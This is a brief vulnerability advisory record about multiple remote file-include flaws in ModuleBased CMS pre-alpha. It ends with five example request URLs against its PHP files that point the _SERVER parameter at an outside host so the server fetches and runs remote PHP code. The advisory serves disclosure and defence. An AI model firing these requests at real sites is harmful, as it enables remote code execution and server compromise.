ModuleBased CMS Multiple Remote File Include Vulnerabilities

2014-07-01T00:00:00
ID SSV:82010
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/19754/info

ModuleBased CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

Version pre-alpha is vulnerable; other versions may also be affected.

+http://www.example.com/[mbcms]/admin/avatar.php?_SERVER=http://www.example.com +http://www.example.com/[mbcms]/libs/archive.class.php?_SERVER=http://www.example.com +http://www.example.com/[mbcms]/libs/login.php?_SERVER=http://www.example.com +http://www.example.com/[mbcms]/libs/profile.class.php?_SERVER=http://www.example.com +http://www.example.com/[mbcms]/libs/profile/process.php?_SERVER=http://www.example.com